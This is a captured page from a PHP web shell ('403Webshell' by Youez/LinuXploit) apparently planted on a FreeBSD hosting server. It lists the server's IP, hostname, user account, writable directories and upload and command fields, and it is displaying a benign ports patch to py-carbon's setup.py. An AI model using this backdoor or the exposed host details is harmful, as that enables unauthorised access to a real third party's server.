403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.217.116
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/databases/py-carbon/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/databases/py-carbon/files/patch-setup.py
--- setup.py.orig	2020-03-16 15:22:22 UTC
+++ setup.py
@@ -58,10 +58,10 @@ else:
   setup_kwargs = dict()
 
 
-storage_dirs = [ ('storage/ceres/dummy.txt', []), ('storage/whisper/dummy.txt',[]),
-                 ('storage/lists',[]), ('storage/log/dummy.txt',[]),
-                 ('storage/rrd/dummy.txt',[]) ]
-conf_files = [ ('conf', glob('conf/*.example')) ]
+storage_dirs = [ ('/var/db/carbon/ceres',[]),  ('/var/db/carbon/whisper',[]),
+                 ('/var/db/carbon/lists',[]), ('/var/db/carbon/log',[]),
+                 ('/var/db/carbon/rrd',[]) ]
+conf_files = [ ('%%PREFIX%%/etc/carbon', glob('conf/*.example')) ]
 
 install_files = storage_dirs + conf_files
 

Youez - 2016 - github.com/yon3zu
LinuXploit